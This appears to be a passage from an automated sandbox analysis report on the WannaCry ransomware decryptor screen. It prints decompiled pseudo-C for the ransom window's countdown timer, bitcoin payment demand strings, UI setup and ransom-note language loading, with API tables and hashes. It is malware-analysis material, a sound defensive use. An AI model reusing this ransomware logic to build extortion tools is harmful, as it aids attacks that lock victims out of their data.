				intOrPtr _t139;
				signed int _t143;
				signed int _t147;
				void* _t148;
				intOrPtr _t161;
				signed int _t192;
				intOrPtr _t193;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				intOrPtr _t200;
				intOrPtr _t202;
				void* _t204;
				intOrPtr _t206;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t213;
				long long _t225;

				_push(0xffffffff);
				_push(E00413EBB);
				_t89 =  *[fs:0x0];
				_push(_t89);
				 *[fs:0x0] = _t206;
				_t207 = _t206 - 0x8c;
				_t196 = 0;
				_t136 = __ecx;
				 *((intOrPtr*)(_t207 + 0x14)) = 0;
				 *((intOrPtr*)(_t207 + 0x18)) = 0;
				 *(_t207 + 0x1c) = 0;
				 *(_t207 + 0x20) = 0;
				_t204 = 0;
				L2:
				__imp__time(_t196);
				_t139 = M00421120; // 0x30303b30
				_t161 = _t89;
				_t90 = "00;00;00;00"; // 0x303b3030
				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
				 *(_t207 + 0x3c) = _t90;
				_t91 =  *0x421124; // 0x30303b
				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
				_t208 = _t207 + 4;
				 *(_t208 + 0x24) = _t196;
				memset(_t208 + 0x44, 0, 0x16 << 2);
				_t209 = _t208 + 0xc;
				if(_t204 != 0) {
					_t94 =  *(_t136 + 0x580);
				} else {
					_t94 =  *(_t136 + 0x57c);
				}
				_t98 =  *((intOrPtr*)(_t136 + 0x578));
				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
				if(_t161 <= _t98) {
					_t99 =  *(_t209 + 0x24);
				} else {
					_t133 = _t98 - _t161 + _t143;
					_t196 = _t133;
					if(_t196 <= 0) {
						_t99 =  *(_t209 + 0x24);
					} else {
						asm("cdq");
						_t99 = _t133 * 0x64 / _t143;
					}
					if(_t196 < 0) {
						_t196 = 0;
					}
				}
				if(_t204 != 0) {
					 *(_t209 + 0x20) = _t99;
				} else {
					 *(_t209 + 0x14) = _t196;
					 *(_t209 + 0x1c) = _t99;
				}
				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
				_t198 = _t197 + _t192 * 0xfffff1f0;
				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
				_t207 = _t209 + 0x18;
				if(_t204 != 0) {
					_t148 = _t136 + 0x444;
					_push(_t207 + 0x38);
				} else {
					_push(_t207 + 0x38);
					_t148 = _t136 + 0x3c8;
				}
				_t89 = E00405180(_t148);
				_t204 = _t204 + 1;
				if(_t204 < 2) {
					_t196 = 0;
					goto L2;
				}
				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0);
				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0);
				L00412DA6();
				 *(_t207 + 0xa4) = 0;
				_t225 =  *((intOrPtr*)(_t136 + 0x584));
				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
					_t225 = _t225 + st0;
					 *(_t136 + 0x818) = 1;
				}
				_t124 =  *((intOrPtr*)(_t136 + 0x588));
				if(_t124 != 0) {
					 *((long long*)(_t207 + 0x14)) = _t225;
					_t200 =  *((intOrPtr*)(_t207 + 0x18));
					_t193 =  *((intOrPtr*)(_t207 + 0x14));
					_push(_t200);
					_push(_t193);
					_t124 = _t136 + 0x81c;
					_push("%.1f BTC");
					_push(_t136 + 0x81c);
					L00412E00();
					_t210 = _t207 + 0x10;
					_push(_t200);
					_push(_t193);
					_push("Send %.1f BTC to this address:");
					_push(_t210 + 0x10);
					L00412E00();
					_t211 = _t210 + 0x10;
				} else {
					L0041304A();
					_t202 = _t124;
					_push(_t202);
					_push("$%d");
					_push(_t136 + 0x81c);
					L00412E00();
					_t213 = _t207 + 0xc;
					_push(_t202);
					_push("Send $%d worth of bitcoin to this address:");
					_push(_t213 + 0x10);
					L00412E00();
					_t211 = _t213 + 0xc;
				}
				_push( *((intOrPtr*)(_t211 + 0x10)));
				_push(0x402);
				L00412CE6();
				L00412CE0();
				_t125 =  *((intOrPtr*)(_t136 + 0x824));
				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
				if(_t125 != 0x121284) {
					E004079C0(_t136);
					_t125 =  *((intOrPtr*)(_t211 + 0xac));
					if(_t125 != 0) {
						InvalidateRect( *(_t136 + 0x20), 0, 1);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
					}
				}
				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
				return _t125;
			}

































                                                      0x004076a0
                                                      0x004076a2
                                                      0x004076a7
                                                      0x004076ad
                                                      0x004076ae
                                                      0x004076b5
                                                      0x004076be
                                                      0x004076c1
                                                      0x004076c3
                                                      0x004076c7
                                                      0x004076cb
                                                      0x004076cf
                                                      0x004076d3
                                                      0x004076d9
                                                      0x004076da
                                                      0x004076e0
                                                      0x004076e6
                                                      0x004076e8
                                                      0x004076ed
                                                      0x004076f1
                                                      0x004076f5
                                                      0x004076fa
                                                      0x004076fe
                                                      0x0040770c
                                                      0x00407712
                                                      0x00407712
                                                      0x00407714
                                                      0x0040771e
                                                      0x00407716
                                                      0x00407716
                                                      0x00407716
                                                      0x00407730
                                                      0x00407736
                                                      0x0040773b
                                                      0x0040775b
                                                      0x0040773d
                                                      0x0040773f
                                                      0x00407741
                                                      0x00407745
                                                      0x0040774f
                                                      0x00407747
                                                      0x0040774a
                                                      0x0040774b
                                                      0x0040774b
                                                      0x00407755
                                                      0x00407757
                                                      0x00407757
                                                      0x00407755
                                                      0x00407761
                                                      0x0040776d
                                                      0x00407763
                                                      0x00407763
                                                      0x00407767
                                                      0x00407767
                                                      0x00407784
                                                      0x0040778d
                                                      0x004077aa
                                                      0x004077bf
                                                      0x004077c8
                                                      0x004077d6
                                                      0x004077e6
                                                      0x0040780e
                                                      0x00407814
                                                      0x00407819
                                                      0x0040782c
                                                      0x00407832
                                                      0x0040781b
                                                      0x0040781f
                                                      0x00407820
                                                      0x00407820
                                                      0x00407833
                                                      0x00407838
                                                      0x0040783c
                                                      0x004076d7
                                                      0x00000000
                                                      0x004076d7
                                                      0x0040785b
                                                      0x00407870
                                                      0x00407876
                                                      0x0040787f
                                                      0x0040788a
                                                      0x00407892
                                                      0x00407894
                                                      0x00407896
                                                      0x00407896
                                                      0x004078a0
                                                      0x004078a8
                                                      0x004078db
                                                      0x004078df
                                                      0x004078e3
                                                      0x004078e7
                                                      0x004078e8
                                                      0x004078e9
                                                      0x004078ef
                                                      0x004078f4
                                                      0x004078f5
                                                      0x004078fa
                                                      0x00407901
                                                      0x00407902
                                                      0x00407903
                                                      0x00407908
                                                      0x00407909
                                                      0x0040790e
                                                      0x004078aa
                                                      0x004078aa
                                                      0x004078af
                                                      0x004078b7
                                                      0x004078b8
                                                      0x004078bd
                                                      0x004078be
                                                      0x004078c3
                                                      0x004078ca
                                                      0x004078cb
                                                      0x004078d0
                                                      0x004078d1
                                                      0x004078d6
                                                      0x004078d6
                                                      0x00407917
                                                      0x00407918
                                                      0x0040791d
                                                      0x00407924
                                                      0x00407929
                                                      0x0040792f
                                                      0x0040793e
                                                      0x00407942
                                                      0x00407947
                                                      0x00407950
                                                      0x0040795a
                                                      0x0040796c
                                                      0x00407973
                                                      0x00407984
                                                      0x0040798b
                                                      0x0040798b
                                                      0x00407950
                                                      0x00407994
                                                      0x0040799f
                                                      0x004079af
                                                      0x004079bc

                                                      APIs
                                                      • time.MSVCRT ref: 004076DA
                                                      • sprintf.MSVCRT ref: 0040780E
                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
                                                      • #540.MFC42 ref: 00407876
                                                      • _ftol.MSVCRT ref: 004078AA
                                                      • #2818.MFC42(?,$%d,00000000), ref: 004078BE
                                                      • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
                                                      • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
                                                      • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
                                                      • #3092.MFC42(00000402,?), ref: 0040791D
                                                      • #6199.MFC42(00000402,?), ref: 00407924
                                                      • InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
                                                      • #800.MFC42 ref: 0040799F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
                                                      • String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
                                                      • API String ID: 993288296-3256873439
                                                      • Opcode ID: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                                      • Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
                                                      • Opcode Fuzzy Hash: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                                      • Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405E10 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E00405E10(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				void* _t86;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				intOrPtr _t132;

				_push(0xffffffff);
				_push(E00413C65);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t132;
				_v20 = __ecx;
				_v4 = 0;
				_t121 = __ecx + 0x890;
				_v16 = _t121;
				 *_t121 = 0x415c00;
				_v4 = 0x1d;
				L00412D52();
				 *_t121 = 0x415bec;
				_t122 = __ecx + 0x888;
				_v16 = _t122;
				 *_t122 = 0x415c00;
				_v4 = 0x1e;
				L00412D52();
				 *_t122 = 0x415bec;
				_t123 = __ecx + 0x880;
				_v16 = _t123;
				 *_t123 = 0x415c00;
				_v4 = 0x1f;
				L00412D52();
				 *_t123 = 0x415bec;
				_t124 = __ecx + 0x878;
				_v16 = _t124;
				 *_t124 = 0x415c00;
				_v4 = 0x20;
				L00412D52();
				 *_t124 = 0x415bec;
				_v4 = 0x18;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				E00403F20(__ecx + 0x870);
				_v4 = 0x17;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				E00403F20(__ecx + 0x868);
				_v4 = 0x16;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				E00403F20(__ecx + 0x860);
				_v4 = 0x15;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				E00403F20(__ecx + 0x858);
				_t125 = __ecx + 0x850;
				_v16 = _t125;
				 *_t125 = 0x415c00;
				_v4 = 0x21;
				L00412D52();
				 *_t125 = 0x415bec;
				_v4 = 0x13;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				E00403F20(__ecx + 0x848);
				_v4 = 0x12;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				E00403F20(__ecx + 0x840);
				_v4 = 0x11;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				E00403F20(__ecx + 0x838);
				_t126 = __ecx + 0x830;
				_v16 = _t126;
				 *_t126 = 0x415c00;
				_v4 = 0x22;
				L00412D52();
				 *_t126 = 0x415bec;
				_v4 = 0xf;
				L00412CC2();
				_v4 = 0xe;
				L00412CC2();
				_v4 = 0xd;
				L00412CC2();
				_v4 = 0xc;
				L00412CC2();
				_v4 = 0xb;
				L00412EF6();
				_v4 = 0xa;
				E004050A0(__ecx + 0x444);
				_v4 = 9;
				E004050A0(__ecx + 0x3c8);
				_v4 = 8;
				E00404170(__ecx + 0x360);
				_v4 = 7;
				E00404170(__ecx + 0x2f8);
				_v4 = 6;
				E00404170(__ecx + 0x290);
				_v4 = 5;
				E00404170(__ecx + 0x228);
				_t127 = __ecx + 0x1a4;
				_v16 = _t127;
				 *_t127 = 0x4161a4;
				_v4 = 0x23;
				L00412F0E();
				_v4 = 4;
				L00412C9E();
				_v4 = 3;
				_t86 = E00405D90(__ecx + 0x120);
				_v4 = 2;
				L00412EF0();
				_v4 = 1;
				L00412EF0();
				_v4 = 0;
				L00412D4C();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t86;
			}
















                                                      0x00405e10
                                                      0x00405e12
                                                      0x00405e1d
                                                      0x00405e1e
                                                      0x00405e2c
                                                      0x00405e30
                                                      0x00405e38
                                                      0x00405e3e
                                                      0x00405e42
                                                      0x00405e4a
                                                      0x00405e4f
                                                      0x00405e54
                                                      0x00405e5a
                                                      0x00405e60
                                                      0x00405e64
                                                      0x00405e6c
                                                      0x00405e71
                                                      0x00405e76
                                                      0x00405e7c
                                                      0x00405e82
                                                      0x00405e86
                                                      0x00405e8e
                                                      0x00405e93
                                                      0x00405e98
                                                      0x00405e9e
                                                      0x00405ea4
                                                      0x00405ea8
                                                      0x00405eb0
                                                      0x00405eb5
                                                      0x00405ec0
                                                      0x00405ec6
                                                      0x00405ecb
                                                      0x00405ed1
                                                      0x00405edc
                                                      0x00405ee1
                                                      0x00405ee7
                                                      0x00405ef2
                                                      0x00405ef7
                                                      0x00405efd
                                                      0x00405f08
                                                      0x00405f0d
                                                      0x00405f13
                                                      0x00405f18
                                                      0x00405f1e
                                                      0x00405f22
                                                      0x00405f2a
                                                      0x00405f2f
                                                      0x00405f3a
                                                      0x00405f40
                                                      0x00405f45
                                                      0x00405f4b
                                                      0x00405f56
                                                      0x00405f5b
                                                      0x00405f61
                                                      0x00405f6c
                                                      0x00405f71
                                                      0x00405f77
                                                      0x00405f7c
                                                      0x00405f82
                                                      0x00405f86
                                                      0x00405f8e
                                                      0x00405f93
                                                      0x00405f9e
                                                      0x00405fa4
                                                      0x00405fa9
                                                      0x00405fb4
                                                      0x00405fb9
                                                      0x00405fc4
                                                      0x00405fc9
                                                      0x00405fd4
                                                      0x00405fd9
                                                      0x00405fe4
                                                      0x00405fe9
                                                      0x00405ff4
                                                      0x00405ff9
                                                      0x00406004
                                                      0x00406009
                                                      0x00406014
                                                      0x00406019
                                                      0x00406024
                                                      0x00406029
                                                      0x00406034
                                                      0x00406039
                                                      0x00406044
                                                      0x00406049
                                                      0x0040604e
                                                      0x00406054
                                                      0x00406058
                                                      0x00406061
                                                      0x00406066
                                                      0x0040606d
                                                      0x00406072
                                                      0x0040607d
                                                      0x00406082
                                                      0x0040608d
                                                      0x00406092
                                                      0x0040609d
                                                      0x004060a2
                                                      0x004060aa
                                                      0x004060af
                                                      0x004060b6
                                                      0x004060be
                                                      0x004060c9
                                                      0x004060d3

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
                                                        • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
                                                      • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
                                                        • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                                        • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                                        • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                        • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                      • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
                                                      • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
                                                        • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                                        • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                                      • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
                                                      • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
                                                      • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
                                                      • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#800$#609#654#765#795$#616#641#781
                                                      • String ID: #
                                                      • API String ID: 2377847243-1885708031
                                                      • Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                                      • Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
                                                      • Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                                      • Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004032C0 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 114windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E004032C0(intOrPtr __ecx) {
				intOrPtr _t16;
				long _t17;
				struct HFONT__* _t19;
				long _t20;
				long _t21;
				long _t23;
				int _t35;
				int _t38;
				int _t40;
				int _t47;
				intOrPtr _t48;

				_t48 = __ecx;
				L00412CB0();
				_t16 =  *0x42189c; // 0x0
				_t17 =  *(_t16 + 0x824);
				 *(__ecx + 0xe8) = _t17;
				_push(CreateSolidBrush(_t17));
				L00412D5E();
				_t47 = __ecx + 0xec;
				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t19);
				L00412D5E();
				_push(0x408);
				L00412CE6();
				if(_t47 != 0) {
					_t35 =  *(_t47 + 4);
				} else {
					_t35 = 0;
				}
				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
				_push(0x409);
				L00412CE6();
				if(_t47 != 0) {
					_t38 =  *(_t47 + 4);
				} else {
					_t38 = 0;
				}
				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
				_push(2);
				L00412CE6();
				if(_t47 != 0) {
					_t40 =  *(_t47 + 4);
				} else {
					_t40 = 0;
				}
				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
				_push(0x40e);
				L00412CE6();
				if(_t47 != 0) {
					_t47 =  *(_t47 + 4);
				}
				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
				E00403CB0(_t48);
				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
				_push(0xffffffff);
				_push(0xffffffff);
				_push(0);
				_push("Path");
				_push(0);
				L00412D58();
				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
				 *0x4217bc = _t48;
				return 1;
			}














                                                      0x004032c3
                                                      0x004032c5
                                                      0x004032ca
                                                      0x004032cf
                                                      0x004032d6
                                                      0x004032e2
                                                      0x004032e9
                                                      0x00403310
                                                      0x00403316
                                                      0x0040331c
                                                      0x0040331f
                                                      0x00403324
                                                      0x0040332b
                                                      0x00403332
                                                      0x00403338
                                                      0x00403334
                                                      0x00403334
                                                      0x00403334
                                                      0x0040334a
                                                      0x0040334c
                                                      0x00403353
                                                      0x0040335a
                                                      0x00403360
                                                      0x0040335c
                                                      0x0040335c
                                                      0x0040335c
                                                      0x0040336c
                                                      0x0040336e
                                                      0x00403372
                                                      0x00403379
                                                      0x0040337f
                                                      0x0040337b
                                                      0x0040337b
                                                      0x0040337b
                                                      0x0040338b
                                                      0x0040338d
                                                      0x00403394
                                                      0x0040339b
                                                      0x0040339d
                                                      0x0040339d
                                                      0x004033a9
                                                      0x004033ad
                                                      0x004033c2
                                                      0x004033c4
                                                      0x004033c6
                                                      0x004033c8
                                                      0x004033ca
                                                      0x004033cf
                                                      0x004033d4
                                                      0x004033ec
                                                      0x004033ee
                                                      0x004033fc

                                                      APIs
                                                      • #4710.MFC42 ref: 004032C5
                                                      • CreateSolidBrush.GDI32(?), ref: 004032DC
                                                      • #1641.MFC42(00000000), ref: 004032E9
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
                                                      • #1641.MFC42(00000000), ref: 0040331F
                                                      • #3092.MFC42(00000408,00000000), ref: 0040332B
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
                                                      • #3092.MFC42(00000409), ref: 00403353
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
                                                      • #3092.MFC42(00000002), ref: 00403372
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
                                                      • #3092.MFC42(0000040E), ref: 00403394
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
                                                      • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
                                                      • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
                                                      • String ID: Arial$Path
                                                      • API String ID: 2448086372-1872211634
                                                      • Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                                      • Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
                                                      • Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                                      • Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406AE0 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 64%
                                                      			E00406AE0(void* __ecx) {
				char _v4;
				char _v12;
				char _v24;
				char _v28;
				intOrPtr _v36;
				char _v40;
				void* _v280;
				char _v284;
				char _v288;
				char _v292;
				void* _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				void* _v312;
				void* _v316;
				char** _t26;
				long _t30;
				void* _t31;
				char** _t32;
				void* _t56;
				intOrPtr _t58;
				void* _t60;

				_push(0xffffffff);
				_push(E00413E61);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_t56 = __ecx;
				L00412DA6();
				_t26 =  &_v284;
				_push(_t26);
				_v4 = 0;
				L00412DD6();
				_push("msg\\");
				L00412CAA();
				_push("m_%s.wnry");
				_push(_t26);
				_push( &_v288);
				_v12 = 1;
				L00412CCE();
				sprintf( &_v292,  *_t26, _v304);
				_t60 = _t58 - 0x110 + 0xc;
				L00412CC2();
				_v24 = 0;
				L00412CC2();
				_t30 = GetFileAttributesA( &_v292);
				if(_t30 == 0xffffffff) {
					_push("msg\\");
					L00412CAA();
					_push("m_%s.wnry");
					_push(_t30);
					_t32 =  &_v300;
					_v28 = 2;
					_push(_t32);
					L00412CCE();
					sprintf( &_v308,  *_t32, "English");
					_t60 = _t60 + 0xc;
					L00412CC2();
					_v40 = 0;
					L00412CC2();
				}
				_t31 = E00406CF0(_t56,  &_v292);
				_v28 = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] = _v36;
				return _t31;
			}


























                                                      0x00406ae0
                                                      0x00406ae2
                                                      0x00406aed
                                                      0x00406aee
                                                      0x00406afc
                                                      0x00406b03
                                                      0x00406b08
                                                      0x00406b0f
                                                      0x00406b10
                                                      0x00406b1b
                                                      0x00406b20
                                                      0x00406b29
                                                      0x00406b2e
                                                      0x00406b37
                                                      0x00406b38
                                                      0x00406b39
                                                      0x00406b41
                                                      0x00406b59
                                                      0x00406b5b
                                                      0x00406b62
                                                      0x00406b6b
                                                      0x00406b73
                                                      0x00406b7d
                                                      0x00406b86
                                                      0x00406b88
                                                      0x00406b91
                                                      0x00406b96
                                                      0x00406b9b
                                                      0x00406b9c
                                                      0x00406ba0
                                                      0x00406ba8
                                                      0x00406ba9
                                                      0x00406bbb
                                                      0x00406bbd
                                                      0x00406bc4
                                                      0x00406bcd
                                                      0x00406bd5
                                                      0x00406bd5
                                                      0x00406be1
                                                      0x00406bea
                                                      0x00406bf5
